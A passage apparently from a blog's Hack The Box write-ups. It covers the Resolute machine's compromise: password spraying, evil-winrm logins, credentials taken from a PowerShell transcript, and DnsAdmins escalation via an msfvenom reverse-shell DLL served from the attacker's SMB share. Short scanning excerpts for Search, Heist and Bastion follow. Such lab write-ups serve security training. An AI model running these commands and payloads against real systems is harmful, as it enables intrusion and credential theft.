index: 0x10b3 RID: 0x19cd acb: 0x00000010 Account: fred Name: (null)    Desc: (null)
index: 0xfbd RID: 0x1f5 acb: 0x00000215 Account: Guest  Name: (null)    Desc: Built-in account for guest access to the computer/domain
index: 0x10b6 RID: 0x19d0 acb: 0x00000010 Account: gustavo      Name: (null)    Desc: (null)
index: 0xff4 RID: 0x1f6 acb: 0x00000011 Account: krbtgt Name: (null)    Desc: Key Distribution Center Service Account
index: 0x10b1 RID: 0x19cb acb: 0x00000010 Account: marcus       Name: (null)    Desc: (null)
index: 0x10a9 RID: 0x457 acb: 0x00000210 Account: marko Name: Marko Novak       Desc: Account created. Password set to Welcome123!
index: 0x10c0 RID: 0x2775 acb: 0x00000010 Account: melanie      Name: (null)    Desc: (null)
index: 0x10c3 RID: 0x2778 acb: 0x00000010 Account: naoki        Name: (null)    Desc: (null)
index: 0x10ba RID: 0x19d4 acb: 0x00000010 Account: paulo        Name: (null)    Desc: (null)
index: 0x10be RID: 0x19d8 acb: 0x00000010 Account: per  Name: (null)    Desc: (null)
index: 0x10a3 RID: 0x451 acb: 0x00000210 Account: ryan  Name: Ryan Bertrand     Desc: (null)
index: 0x10b2 RID: 0x19cc acb: 0x00000010 Account: sally        Name: (null)    Desc: (null)
index: 0x10c2 RID: 0x2777 acb: 0x00000010 Account: simon        Name: (null)    Desc: (null)
index: 0x10bb RID: 0x19d5 acb: 0x00000010 Account: steve        Name: (null)    Desc: (null)
index: 0x10b8 RID: 0x19d2 acb: 0x00000010 Account: stevie       Name: (null)    Desc: (null)
index: 0x10af RID: 0x19c9 acb: 0x00000010 Account: sunita       Name: (null)    Desc: (null)
index: 0x10b7 RID: 0x19d1 acb: 0x00000010 Account: ulf  Name: (null)    Desc: (null)
index: 0x10c1 RID: 0x2776 acb: 0x00000010 Account: zach Name: (null)    Desc: (null)
  • We can also dump information using ldapsearch
    • ldapsearch -H ldap://10.10.10.169 -x -b "DC=MEGABANK,DC=LOCAL"

Foothold/User #1

  • Okay, looks like marco is newly created account with comment Account created. Password set to Welcome123!
└─$ crackmapexec smb 10.10.10.169 -u marco -p 'Welcome123!'
SMB         10.10.10.169    445    RESOLUTE         [*] Windows Server 2016 Standard 14393 x64 (name:RESOLUTE) (domain:megabank.local) (signing:True) (SMBv1:True)
SMB         10.10.10.169    445    RESOLUTE         [-] megabank.local\marco:Welcome123! STATUS_LOGON_FAILURE
  • We could try password spraying with `Welcome123!
    • It could be that some of the users haven’t changed it yet
└─$ crackmapexec smb 10.10.10.169 -u users.list -p 'Welcome123!' --continue-on-success
SMB         10.10.10.169    445    RESOLUTE         [*] Windows Server 2016 Standard 14393 x64 (name:RESOLUTE) (domain:megabank.local) (signing:True) (SMBv1:True)
SMB         10.10.10.169    445    RESOLUTE         [-] megabank.local\Administrator:Welcome123! STATUS_LOGON_FAILURE 
SMB         10.10.10.169    445    RESOLUTE         [-] megabank.local\Guest:Welcome123! STATUS_LOGON_FAILURE 
SMB         10.10.10.169    445    RESOLUTE         [-] megabank.local\krbtgt:Welcome123! STATUS_LOGON_FAILURE 
SMB         10.10.10.169    445    RESOLUTE         [-] megabank.local\DefaultAccount:Welcome123! STATUS_LOGON_FAILURE 
SMB         10.10.10.169    445    RESOLUTE         [-] megabank.local\ryan:Welcome123! STATUS_LOGON_FAILURE 
SMB         10.10.10.169    445    RESOLUTE         [-] megabank.local\marko:Welcome123! STATUS_LOGON_FAILURE 
SMB         10.10.10.169    445    RESOLUTE         [-] megabank.local\sunita:Welcome123! STATUS_LOGON_FAILURE 
SMB         10.10.10.169    445    RESOLUTE         [-] megabank.local\abigail:Welcome123! STATUS_LOGON_FAILURE 
SMB         10.10.10.169    445    RESOLUTE         [-] megabank.local\marcus:Welcome123! STATUS_LOGON_FAILURE 
SMB         10.10.10.169    445    RESOLUTE         [-] megabank.local\sally:Welcome123! STATUS_LOGON_FAILURE 
SMB         10.10.10.169    445    RESOLUTE         [-] megabank.local\fred:Welcome123! STATUS_LOGON_FAILURE 
SMB         10.10.10.169    445    RESOLUTE         [-] megabank.local\angela:Welcome123! STATUS_LOGON_FAILURE 
SMB         10.10.10.169    445    RESOLUTE         [-] megabank.local\felicia:Welcome123! STATUS_LOGON_FAILURE 
SMB         10.10.10.169    445    RESOLUTE         [-] megabank.local\gustavo:Welcome123! STATUS_LOGON_FAILURE 
SMB         10.10.10.169    445    RESOLUTE         [-] megabank.local\ulf:Welcome123! STATUS_LOGON_FAILURE 
SMB         10.10.10.169    445    RESOLUTE         [-] megabank.local\stevie:Welcome123! STATUS_LOGON_FAILURE 
SMB         10.10.10.169    445    RESOLUTE         [-] megabank.local\claire:Welcome123! STATUS_LOGON_FAILURE 
SMB         10.10.10.169    445    RESOLUTE         [-] megabank.local\paulo:Welcome123! STATUS_LOGON_FAILURE 
SMB         10.10.10.169    445    RESOLUTE         [-] megabank.local\steve:Welcome123! STATUS_LOGON_FAILURE 
SMB         10.10.10.169    445    RESOLUTE         [-] megabank.local\annette:Welcome123! STATUS_LOGON_FAILURE 
SMB         10.10.10.169    445    RESOLUTE         [-] megabank.local\annika:Welcome123! STATUS_LOGON_FAILURE 
SMB         10.10.10.169    445    RESOLUTE         [-] megabank.local\per:Welcome123! STATUS_LOGON_FAILURE 
SMB         10.10.10.169    445    RESOLUTE         [-] megabank.local\claude:Welcome123! STATUS_LOGON_FAILURE 
SMB         10.10.10.169    445    RESOLUTE         [+] megabank.local\melanie:Welcome123! 
SMB         10.10.10.169    445    RESOLUTE         [-] megabank.local\zach:Welcome123! STATUS_LOGON_FAILURE 
SMB         10.10.10.169    445    RESOLUTE         [-] megabank.local\simon:Welcome123! STATUS_LOGON_FAILURE 
SMB         10.10.10.169    445    RESOLUTE         [-] megabank.local\naoki:Welcome123! STATUS_LOGON_FAILURE
  • We have a hit melanie:Welcome123!
    • Let’s try evil-winrm and it works
└─$ evil-winrm -i 10.10.10.169 -u melanie -p 'Welcome123!'     
                                        
Evil-WinRM shell v3.5
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\melanie\Documents>

User #2

  • We have another user ryan
*Evil-WinRM* PS C:\> ls -force users


    Directory: C:\users


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-----        9/25/2019  10:43 AM                Administrator
d--hsl        7/16/2016   6:28 AM                All Users
d-rh--        9/25/2019  10:17 AM                Default
d--hsl        7/16/2016   6:28 AM                Default User
d-----        12/4/2019   2:46 AM                melanie
d-r---       11/20/2016   6:39 PM                Public
d-----        9/27/2019   7:05 AM                ryan
-a-hs-        7/16/2016   6:16 AM            174 desktop.ini
  • Before running winpeas, I will manually check obvious places
*Evil-WinRM* PS C:\> ls -force c:\


    Directory: C:\


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d--hs-        12/3/2019   6:40 AM                $RECYCLE.BIN
d--hsl        9/25/2019  10:17 AM                Documents and Settings
d-----        9/25/2019   6:19 AM                PerfLogs
d-r---        9/25/2019  12:39 PM                Program Files
d-----       11/20/2016   6:36 PM                Program Files (x86)
d--h--        9/25/2019  10:48 AM                ProgramData
d--h--        12/3/2019   6:32 AM                PSTranscripts
d--hs-        9/25/2019  10:17 AM                Recovery
d--hs-        9/25/2019   6:25 AM                System Volume Information
d-r---        12/4/2019   2:46 AM                Users
d-----        12/4/2019   5:15 AM                Windows
-arhs-       11/20/2016   5:59 PM         389408 bootmgr
-a-hs-        7/16/2016   6:10 AM              1 BOOTNXT
-a-hs-         9/4/2023   8:51 AM      402653184 pagefile.sys
  • C:\PSTranscripts
*Evil-WinRM* PS C:\PSTranscripts\20191203> ls -force


    Directory: C:\PSTranscripts\20191203


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-arh--        12/3/2019   6:45 AM           3732 PowerShell_transcript.RESOLUTE.OJuoBGhU.20191203063201.txt
  • Let’s check the content
*Evil-WinRM* PS C:\PSTranscripts\20191203> type PowerShell_transcript.RESOLUTE.OJuoBGhU.20191203063201.txt

**********************
Windows PowerShell transcript start
Start time: 20191203063201
Username: MEGABANK\ryan
RunAs User: MEGABANK\ryan
Machine: RESOLUTE (Microsoft Windows NT 10.0.14393.0)
Host Application: C:\Windows\system32\wsmprovhost.exe -Embedding
Process ID: 2800
PSVersion: 5.1.14393.2273
PSEdition: Desktop
PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.14393.2273
BuildVersion: 10.0.14393.2273
CLRVersion: 4.0.30319.42000
WSManStackVersion: 3.0
PSRemotingProtocolVersion: 2.3
SerializationVersion: 1.1.0.1
**********************
Command start time: 20191203063455
**********************
PS>TerminatingError(): "System error."
>> CommandInvocation(Invoke-Expression): "Invoke-Expression"
>> ParameterBinding(Invoke-Expression): name="Command"; value="-join($id,'PS ',$(whoami),'@',$env:computername,' ',$((gi $pwd).Name),'> ')
if (!$?) { if($LASTEXITCODE) { exit $LASTEXITCODE } else { exit 1 } }"
>> CommandInvocation(Out-String): "Out-String"
>> ParameterBinding(Out-String): name="Stream"; value="True"
**********************
Command start time: 20191203063455
**********************
PS>ParameterBinding(Out-String): name="InputObject"; value="PS megabank\ryan@RESOLUTE Documents> "
PS megabank\ryan@RESOLUTE Documents>
**********************
Command start time: 20191203063515
**********************
PS>CommandInvocation(Invoke-Expression): "Invoke-Expression"
>> ParameterBinding(Invoke-Expression): name="Command"; value="cmd /c net use X: \\fs01\backups ryan Serv3r4Admin4cc123!

if (!$?) { if($LASTEXITCODE) { exit $LASTEXITCODE } else { exit 1 } }"
>> CommandInvocation(Out-String): "Out-String"
>> ParameterBinding(Out-String): name="Stream"; value="True"
**********************
Windows PowerShell transcript start
Start time: 20191203063515
Username: MEGABANK\ryan
RunAs User: MEGABANK\ryan
Machine: RESOLUTE (Microsoft Windows NT 10.0.14393.0)
Host Application: C:\Windows\system32\wsmprovhost.exe -Embedding
Process ID: 2800
PSVersion: 5.1.14393.2273
PSEdition: Desktop
PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.14393.2273
BuildVersion: 10.0.14393.2273
CLRVersion: 4.0.30319.42000
WSManStackVersion: 3.0
PSRemotingProtocolVersion: 2.3
SerializationVersion: 1.1.0.1
**********************
**********************
Command start time: 20191203063515
**********************
PS>CommandInvocation(Out-String): "Out-String"
>> ParameterBinding(Out-String): name="InputObject"; value="The syntax of this command is:"
cmd : The syntax of this command is:
At line:1 char:1
+ cmd /c net use X: \\fs01\backups ryan Serv3r4Admin4cc123!
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : NotSpecified: (The syntax of this command is::String) [], RemoteException
    + FullyQualifiedErrorId : NativeCommandError
cmd : The syntax of this command is:
At line:1 char:1
+ cmd /c net use X: \\fs01\backups ryan Serv3r4Admin4cc123!
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : NotSpecified: (The syntax of this command is::String) [], RemoteException
    + FullyQualifiedErrorId : NativeCommandError
**********************
Windows PowerShell transcript start
Start time: 20191203063515
Username: MEGABANK\ryan
RunAs User: MEGABANK\ryan
Machine: RESOLUTE (Microsoft Windows NT 10.0.14393.0)
Host Application: C:\Windows\system32\wsmprovhost.exe -Embedding
Process ID: 2800
PSVersion: 5.1.14393.2273
PSEdition: Desktop
PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.14393.2273
BuildVersion: 10.0.14393.2273
CLRVersion: 4.0.30319.42000
WSManStackVersion: 3.0
PSRemotingProtocolVersion: 2.3
SerializationVersion: 1.1.0.1
**********************
  • We found creds: ryan:Serv3r4Admin4cc123!
    • If we check ryan groups membership, we see that he can evil-winrm since he’s in Contractors group
*Evil-WinRM* PS C:\PSTranscripts\20191203> net user ryan
User name                    ryan
Full Name                    Ryan Bertrand
Comment
User's comment
Country/region code          000 (System Default)
Account active               Yes
Account expires              Never

Password last set            9/4/2023 10:36:02 AM
Password expires             Never
Password changeable          9/5/2023 10:36:02 AM
Password required            Yes
User may change password     Yes

Workstations allowed         All
Logon script
User profile
Home directory
Last logon                   Never

Logon hours allowed          All

Local Group Memberships
Global Group memberships     *Domain Users         *Contractors
The command completed successfully.

*Evil-WinRM* PS C:\PSTranscripts\20191203> net localgroup "Remote Management Users"
Alias name     Remote Management Users
Comment        Members of this group can access WMI resources over management protocols (such as WS-Management via the Windows Remote Management service). This applies only to WMI namespaces that grant access to the user.

Members

-------------------------------------------------------------------------------
Contractors
melanie
The command completed successfully.
  • Let’s connect
└─$ evil-winrm -i 10.10.10.169  -u ryan -p 'Serv3r4Admin4cc123!'     
                                        
Evil-WinRM shell v3.5
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\ryan\Documents>

Root

*Evil-WinRM* PS C:\Users\ryan> whoami /groups

GROUP INFORMATION
-----------------

Group Name                                 Type             SID                                            Attributes
========================================== ================ ============================================== ===============================================================
Everyone                                   Well-known group S-1-1-0                                        Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                              Alias            S-1-5-32-545                                   Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias            S-1-5-32-554                                   Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users            Alias            S-1-5-32-580                                   Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK                       Well-known group S-1-5-2                                        Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users           Well-known group S-1-5-11                                       Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization             Well-known group S-1-5-15                                       Mandatory group, Enabled by default, Enabled group
MEGABANK\Contractors                       Group            S-1-5-21-1392959593-3013219662-3596683436-1103 Mandatory group, Enabled by default, Enabled group
MEGABANK\DnsAdmins                         Alias            S-1-5-21-1392959593-3013219662-3596683436-1101 Mandatory group, Enabled by default, Enabled group, Local Group
NT AUTHORITY\NTLM Authentication           Well-known group S-1-5-64-10                                    Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Mandatory Level     Label            S-1-16-8192
  • Found a note.txt on ryan’s desktop
*Evil-WinRM* PS C:\Users\ryan> type desktop\note.txt
Email to team:

- due to change freeze, any system changes (apart from those to the administrator account) will be automatically reverted within 1 minute

└─$ msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.16.5 LPORT=6666 -f dll > evil.dll   
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 460 bytes
Final size of dll file: 9216 bytes
  • Now we need to register dll
    • We could upload it or share it via smb
    • Start impacket-smbserver
    • Then load evil.dll
└─$ impacket-smbserver share $(pwd) -smb2support
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation

[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed

*Evil-WinRM* PS C:\Users\ryan> dnscmd.exe localhost /config /serverlevelplugindll \\10.10.16.5\share\evil.dll

Registry property serverlevelplugindll successfully reset.
Command completed successfully.
  • Next we need restart dns service
*Evil-WinRM* PS C:\Users\ryan\Documents> sc.exe stop dns

SERVICE_NAME: dns
        TYPE               : 10  WIN32_OWN_PROCESS
        STATE              : 3  STOP_PENDING
                                (STOPPABLE, PAUSABLE, ACCEPTS_SHUTDOWN)
        WIN32_EXIT_CODE    : 0  (0x0)
        SERVICE_EXIT_CODE  : 0  (0x0)
        CHECKPOINT         : 0x0
        WAIT_HINT          : 0x0

*Evil-WinRM* PS C:\Users\ryan\Documents> sc.exe start dns

SERVICE_NAME: dns
        TYPE               : 10  WIN32_OWN_PROCESS
        STATE              : 2  START_PENDING
                                (NOT_STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN)
        WIN32_EXIT_CODE    : 0  (0x0)
        SERVICE_EXIT_CODE  : 0  (0x0)
        CHECKPOINT         : 0x0
        WAIT_HINT          : 0x7d0
        PID                : 1668
        FLAGS              :
  • If everything is okay, we should receive shell

Friday, September 1, 2023 | 12 minutes Read
Hero Image
[HTB] Machine: Search

Search

Enumeration

  • nmap
└─$ nmap -Pn -p- 10.10.11.129 -T4                
Starting Nmap 7.94 ( https://nmap.org ) at 2023-09-23 21:42 BST
Warning: 10.10.11.129 giving up on port because retransmission cap hit (6).
Nmap scan report for 10.10.11.129 (10.10.11.129)
Host is up (0.10s latency).
Not shown: 65514 filtered tcp ports (no-response)
PORT      STATE SERVICE
53/tcp    open  domain
80/tcp    open  http
88/tcp    open  kerberos-sec
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
389/tcp   open  ldap
443/tcp   open  https
445/tcp   open  microsoft-ds
464/tcp   open  kpasswd5
593/tcp   open  http-rpc-epmap
636/tcp   open  ldapssl
3268/tcp  open  globalcatLDAP
3269/tcp  open  globalcatLDAPssl
8172/tcp  open  unknown
9389/tcp  open  adws
49667/tcp open  unknown
49675/tcp open  unknown
49676/tcp open  unknown
49702/tcp open  unknown
49712/tcp open  unknown
49733/tcp open  unknown

Nmap done: 1 IP address (1 host up) scanned in 1222.26 seconds

└─$ nmap -Pn -p53,80,88,135,139,389,443,445,464,593,636,3268,3269,8172,9389 -sC -sV 10.10.11.129 -T4
Starting Nmap 7.94 ( https://nmap.org ) at 2023-09-23 22:12 BST
Nmap scan report for 10.10.11.129 (10.10.11.129)
Host is up (0.18s latency).

PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
80/tcp   open  http          Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Search &mdash; Just Testing IIS
| http-methods: 
|_  Potentially risky methods: TRACE
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2023-09-23 21:12:07Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: search.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=research
| Not valid before: 2020-08-11T08:13:35
|_Not valid after:  2030-08-09T08:13:35
|_ssl-date: 2023-09-23T21:13:36+00:00; -41s from scanner time.
443/tcp  open  ssl/http      Microsoft IIS httpd 10.0
|_ssl-date: 2023-09-23T21:13:36+00:00; -41s from scanner time.
| tls-alpn: 
|_  http/1.1
| http-methods: 
|_  Potentially risky methods: TRACE
| ssl-cert: Subject: commonName=research
| Not valid before: 2020-08-11T08:13:35
|_Not valid after:  2030-08-09T08:13:35
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Search &mdash; Just Testing IIS
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: search.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2023-09-23T21:13:36+00:00; -41s from scanner time.
| ssl-cert: Subject: commonName=research
| Not valid before: 2020-08-11T08:13:35
|_Not valid after:  2030-08-09T08:13:35
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: search.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2023-09-23T21:13:36+00:00; -41s from scanner time.
| ssl-cert: Subject: commonName=research
| Not valid before: 2020-08-11T08:13:35
|_Not valid after:  2030-08-09T08:13:35
3269/tcp open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: search.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2023-09-23T21:13:36+00:00; -41s from scanner time.
| ssl-cert: Subject: commonName=research
| Not valid before: 2020-08-11T08:13:35
|_Not valid after:  2030-08-09T08:13:35
8172/tcp open  ssl/http      Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
| ssl-cert: Subject: commonName=WMSvc-SHA2-RESEARCH
| Not valid before: 2020-04-07T09:05:25
|_Not valid after:  2030-04-05T09:05:25
|_http-title: Site doesn't have a title.
|_ssl-date: 2023-09-23T21:13:36+00:00; -41s from scanner time.
| tls-alpn: 
|_  http/1.1
9389/tcp open  mc-nmf        .NET Message Framing
Service Info: Host: RESEARCH; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: -40s, deviation: 0s, median: -41s
| smb2-time: 
|   date: 2023-09-23T21:13:05
|_  start_date: N/A
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 99.21 seconds
  • smb
└─$ smbclient -N -L //search.htb                              
Anonymous login successful

        Sharename       Type      Comment
        ---------       ----      -------
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to search.htb failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available
  • Web Server
    • Ports 80, 443

Friday, September 1, 2023 | 11 minutes Read
Hero Image
[HTB] Machine: Heist

Heist

Enumeration

  • nmap
└─$ nmap -sC -sV -Pn 10.10.10.149
Starting Nmap 7.93 ( https://nmap.org ) at 2023-06-24 10:40 BST
Nmap scan report for 10.10.10.149 (10.10.10.149)
Host is up (0.10s latency).
Not shown: 997 filtered tcp ports (no-response)
PORT    STATE SERVICE       VERSION
80/tcp  open  http          Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
| http-title: Support Login Page
|_Requested resource was login.php
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|_      httponly flag not set
| http-methods: 
|_  Potentially risky methods: TRACE
135/tcp open  msrpc         Microsoft Windows RPC
445/tcp open  microsoft-ds?
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: -30s
| smb2-time: 
|   date: 2023-06-24T09:40:31
|_  start_date: N/A
| smb2-security-mode: 
|   311: 
|_    Message signing enabled but not required

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 63.50 seconds
  • gobuster
└─$ gobuster dir -u http://10.10.10.149 -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -t 50 -x asp,aspx,php
===============================================================
Gobuster v3.5
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.10.149
[+] Method:                  GET
[+] Threads:                 50
[+] Wordlist:                /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.5
[+] Extensions:              asp,aspx,php
[+] Timeout:                 10s
===============================================================
2023/06/24 11:12:31 Starting gobuster in directory enumeration mode
===============================================================
/images               (Status: 301) [Size: 150] [--> http://10.10.10.149/images/]
/index.php            (Status: 302) [Size: 0] [--> login.php]
/login.php            (Status: 200) [Size: 2058]
/Images               (Status: 301) [Size: 150] [--> http://10.10.10.149/Images/]
/issues.php           (Status: 302) [Size: 16] [--> login.php]
/css                  (Status: 301) [Size: 147] [--> http://10.10.10.149/css/]
/Index.php            (Status: 302) [Size: 0] [--> login.php]
/Login.php            (Status: 200) [Size: 2058]
/js                   (Status: 301) [Size: 146] [--> http://10.10.10.149/js/]
/Issues.php           (Status: 302) [Size: 16] [--> login.php]
/attachments          (Status: 301) [Size: 155] [--> http://10.10.10.149/attachments/]
/IMAGES               (Status: 301) [Size: 150] [--> http://10.10.10.149/IMAGES/]
/INDEX.php            (Status: 302) [Size: 0] [--> login.php]
/CSS                  (Status: 301) [Size: 147] [--> http://10.10.10.149/CSS/]
/JS                   (Status: 301) [Size: 146] [--> http://10.10.10.149/JS/]
/Attachments          (Status: 301) [Size: 155] [--> http://10.10.10.149/Attachments/]
/LogIn.php            (Status: 200) [Size: 2058]
/LOGIN.php            (Status: 200) [Size: 2058]
Progress: 882180 / 882244 (99.99%)
===============================================================
2023/06/24 11:59:05 Finished
===============================================================
  • Web server

Friday, June 23, 2023 | 3 minutes Read
Hero Image
[HTB] Machine: Bastion

Bastion

Enumeration

  • nmap
└─$ nmap -Pn -sC -sV 10.10.10.134 -T4
Starting Nmap 7.93 ( https://nmap.org ) at 2023-06-17 21:20 BST
Nmap scan report for 10.10.10.134 (10.10.10.134)
Host is up (0.13s latency).
Not shown: 996 closed tcp ports (conn-refused)
PORT    STATE SERVICE      VERSION
22/tcp  open  ssh          OpenSSH for_Windows_7.9 (protocol 2.0)
| ssh-hostkey: 
|   2048 3a56ae753c780ec8564dcb1c22bf458a (RSA)
|   256 cc2e56ab1997d5bb03fb82cd63da6801 (ECDSA)
|_  256 935f5daaca9f53e7f282e664a8a3a018 (ED25519)
135/tcp open  msrpc        Microsoft Windows RPC
139/tcp open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp open  microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time: 
|   date: 2023-06-17T20:20:50
|_  start_date: 2023-06-17T18:27:22
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
|_clock-skew: mean: -40m29s, deviation: 1h09m15s, median: -30s
| smb2-security-mode: 
|   311: 
|_    Message signing enabled but not required
| smb-os-discovery: 
|   OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
|   Computer name: Bastion
|   NetBIOS computer name: BASTION\x00
|   Workgroup: WORKGROUP\x00
|_  System time: 2023-06-17T22:20:49+02:00

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 40.14 seconds
  • smbmap
└─$ smbmap -H 10.10.10.134 -R -u pentest
[+] Guest session       IP: 10.10.10.134:445    Name: 10.10.10.134                                      
[-] Work[!] Unable to remove test directory at \\10.10.10.134\Backups\UEQFPWNJOX, please remove manually
        Disk                                                    Permissions     Comment
        ----                                                    -----------     -------
        ADMIN$                                                  NO ACCESS       Remote Admin
        Backups                                                 READ, WRITE
        .\Backups\*
        dr--r--r--                0 Sun Jun 18 09:58:58 2023    .
        dr--r--r--                0 Sun Jun 18 09:58:58 2023    ..
        fw--w--w--              116 Tue Apr 16 12:43:19 2019    note.txt
        fr--r--r--                0 Fri Feb 22 12:43:28 2019    SDT65CB.tmp
        dr--r--r--                0 Sun Jun 18 09:58:58 2023    UEQFPWNJOX
        dr--r--r--                0 Fri Feb 22 12:44:02 2019    WindowsImageBackup
        .\Backups\WindowsImageBackup\*
        dr--r--r--                0 Fri Feb 22 12:44:02 2019    .
        dr--r--r--                0 Fri Feb 22 12:44:02 2019    ..
        dr--r--r--                0 Fri Feb 22 12:45:32 2019    L4mpje-PC
        .\Backups\WindowsImageBackup\L4mpje-PC\*
        dr--r--r--                0 Fri Feb 22 12:45:32 2019    .
        dr--r--r--                0 Fri Feb 22 12:45:32 2019    ..
        dr--r--r--                0 Fri Feb 22 12:45:32 2019    Backup 2019-02-22 124351
        dr--r--r--                0 Fri Feb 22 12:45:32 2019    Catalog
        fr--r--r--               16 Fri Feb 22 12:44:02 2019    MediaId
        dr--r--r--                0 Fri Feb 22 12:45:32 2019    SPPMetadataCache
        .\Backups\WindowsImageBackup\L4mpje-PC\Backup 2019-02-22 124351\*
        dr--r--r--                0 Fri Feb 22 12:45:32 2019    .
        dr--r--r--                0 Fri Feb 22 12:45:32 2019    ..
        fr--r--r--         37761024 Fri Feb 22 12:44:03 2019    9b9cfbc3-369e-11e9-a17c-806e6f6e6963.vhd
        fr--r--r--       5418299392 Fri Feb 22 12:45:32 2019    9b9cfbc4-369e-11e9-a17c-806e6f6e6963.vhd
        fr--r--r--             1186 Fri Feb 22 12:45:32 2019    BackupSpecs.xml
        fr--r--r--             1078 Fri Feb 22 12:45:32 2019    cd113385-65ff-4ea2-8ced-5630f6feca8f_AdditionalFilesc3b9f3c7-5e52-4d5e-8b20-19adc95a34c7.xml
        fr--r--r--             8930 Fri Feb 22 12:45:32 2019    cd113385-65ff-4ea2-8ced-5630f6feca8f_Components.xml
        fr--r--r--             6542 Fri Feb 22 12:45:32 2019    cd113385-65ff-4ea2-8ced-5630f6feca8f_RegistryExcludes.xml
        fr--r--r--             2894 Fri Feb 22 12:45:32 2019    cd113385-65ff-4ea2-8ced-5630f6feca8f_Writer4dc3bdd4-ab48-4d07-adb0-3bee2926fd7f.xml
        fr--r--r--             1488 Fri Feb 22 12:45:32 2019    cd113385-65ff-4ea2-8ced-5630f6feca8f_Writer542da469-d3e1-473c-9f4f-7847f01fc64f.xml
        fr--r--r--             1484 Fri Feb 22 12:45:32 2019    cd113385-65ff-4ea2-8ced-5630f6feca8f_Writera6ad56c2-b509-4e6c-bb19-49d8f43532f0.xml
        fr--r--r--             3844 Fri Feb 22 12:45:32 2019    cd113385-65ff-4ea2-8ced-5630f6feca8f_Writerafbab4a2-367d-4d15-a586-71dbb18f8485.xml
        fr--r--r--             3988 Fri Feb 22 12:45:32 2019    cd113385-65ff-4ea2-8ced-5630f6feca8f_Writerbe000cbe-11fe-4426-9c58-531aa6355fc4.xml
